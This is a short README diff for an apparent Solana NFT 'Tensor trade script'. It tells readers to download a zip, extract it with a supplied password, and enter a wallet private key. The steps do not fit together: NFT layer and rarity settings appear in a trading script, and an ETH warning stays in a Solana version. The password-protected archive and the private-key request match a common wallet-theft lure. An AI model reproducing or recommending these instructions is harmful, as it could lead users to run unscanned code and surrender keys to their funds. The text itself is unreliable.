origami-xyz/Tensor-trade-script/README.md

 - [Clone](https://github.com/origami-xyz/Tensor-trade-script/archive/refs/heads/main.zip) repository and extract files with password `Ci27S0etuIh`.
 - Edit config.json with your data and launch script.
 - Add layer images by folders, set up rarity settings, select folder to save.
-- Input your ETH private key.
+- Input your Solana private key.
 Ensure that you do not utilize your primary account or seed phrase
 - Do not set the price higher than the floor!
 Otherwise, you risk losing all your ETH to random NFTs.